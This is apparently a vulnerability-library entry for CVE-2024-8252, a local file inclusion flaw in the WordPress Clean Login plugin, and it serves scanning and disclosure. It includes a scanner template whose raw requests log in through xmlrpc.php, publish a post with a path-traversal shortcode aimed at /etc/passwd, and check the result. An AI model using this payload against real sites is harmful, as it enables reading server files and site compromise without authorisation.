/Vulnerability Library

WordPress Clean Login <= 1.14.5 Authenticated (Contributor+) - Local File Inclusion

CVE-2024-8252
Verified

Description

The Clean Login plugin for WordPress up to version 1.14.5 contains a path traversal caused by the 'template' attribute in the clean-login-register shortcode, letting authenticated attackers with contributor access include and execute arbitrary files, exploit requires attacker to have contributor or higher access level.

Severity

High

CVSS Score

8.8

Affected Product

clean-login

Published Date

April 8, 2026

Template Author

pussycat0x

CVE-2024-8252.yaml
id: CVE-2024-8252

info:
  name: WordPress Clean Login <= 1.14.5 Authenticated (Contributor+) - Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    The Clean Login plugin for WordPress up to version 1.14.5 contains a path traversal caused by the 'template' attribute in the clean-login-register shortcode, letting authenticated attackers with contributor access include and execute arbitrary files, exploit requires attacker to have contributor or higher access level.
  impact: |
    Authenticated attackers can include and execute arbitrary PHP files, leading to remote code execution and potential full site compromise.
  remediation: |
    Update to the latest version of the plugin, above 1.14.5, to fix the vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clean-login/clean-login-1145-authenticated-contributor-local-file-inclusion
    - https://plugins.trac.wordpress.org/changeset/3143241/clean-login
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-98
  metadata:
    max-request: 4
    verified: true
    product: clean-login
    vendor: codection
    shodan-query: http.component:"WordPress"
  tags: cve,cve2024,wordpress,wp-plugin,lfi,clean-login,authenticated

flow: http(1) && http(2) && http(3)

http:
  - id: version-detect
    method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/clean-login/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Clean Login")'
          - 'compare_versions(version, "<= 1.14.5")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
        <methodName>wp.getUsersBlogs</methodName>
        <params>
        <param><value><string>{{username}}</string></value></param>
        <param><value><string>{{password}}</string></value></param>
        </params>
        </methodCall>

      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
        <methodName>wp.newPost</methodName>
          <params>
            <param><value><int>1</int></value></param>
            <param><value><string>{{username}}</string></value></param>
            <param><value><string>{{password}}</string></value></param>
            <param>
            <value>
            <struct>
            <member>
            <name>post_title</name>
            <value><string>{{randstr}}</string></value>
          </member>
          <member>
            <name>post_content</name>
            <value><string>[clean-login-register template="../../../../../../../etc/passwd"]</string></value>
          </member>
          <member>
            <name>post_status</name>
            <value><string>publish</string></value>
          </member>
          <member>
            <name>post_type</name>
            <value><string>post</string></value>
          </member>
        </struct>
        </value>
        </param>
        </params>
        </methodCall>

    extractors:
      - type: regex
        name: postid
        part: body_2
        group: 1
        regex:
          - '<string>(\d+)</string>'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "<string>")'
          - 'contains(body_2, "<param>")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?p={{postid}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
        condition: and
# digest: 4b0a00483046022100d96476cf80afa745eda2683581c4e1da10fa8ff22d2bd9649f09576ba2e5e161022100ab7e213d43d52aa642b5454e5290323c219faeaec9fe055d488548a218cf5501:922c64590222798bb761d5b6d8e72950
8.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE ID:
cwe-98

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clean-login/clean-login-1145-authenticated-contributor-local-file-inclusionhttps://plugins.trac.wordpress.org/changeset/3143241/clean-login

Remediation Steps

Update to the latest version of the plugin, above 1.14.5, to fix the vulnerability.